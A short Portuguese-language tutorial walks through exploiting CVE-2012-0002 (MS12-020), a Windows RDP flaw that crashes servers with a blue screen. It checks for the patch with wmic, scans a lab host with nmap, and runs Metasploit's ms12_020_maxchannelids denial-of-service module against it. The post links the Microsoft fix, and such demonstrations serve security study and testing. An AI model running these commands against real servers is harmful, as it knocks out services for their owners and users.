CVE-2012-0002 : MS12-020 – Vulnerabilidade no RDP

Essa vulnerabilidade ao ser explorada causa a tela azul (Blue Screen) no servidor afetado indisponibilizando todos os serviços.

Solução: support.microsoft.com/kb/2671387

01 - Passo

Verifique se o sistema possui o KB2621440 aplicado, utilize o comando abaixo:

  Windows

wmic qfe where "HotfixID = 'KB2621440'"

02 - Passo

Verifique as portas abertas utilizando o nmap e certifique-se que a porta 3389 (RDP) está aberta.

  Linux

nmap 10.10.10.20

03 - Passo

Execute o msfconsole e utilize o payload ms12_020_maxchannelids.

  Linux

msfconsole

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

04 - Passo

Execute o comando show options para exibir as opções em seguida defina o RHOST ou seja host alvo.

  Linux

msf auxiliary(ms12_020_maxchannelids)  > show options

msf auxiliary(ms12_020_maxchannelids)  > set RHOST 10.10.10.20

05 - Passo

Execute o comando show options novamente para certificar que o RHOST foi definido e execute o comando exploit para explorar a vulnerabilidade.

  Linux

msf auxiliary(ms12_020_maxchannelids)  > show options

msf auxiliary(ms12_020_maxchannelids)  >  exploit

Resultado

Vulnerabilidade explorada com sucesso!.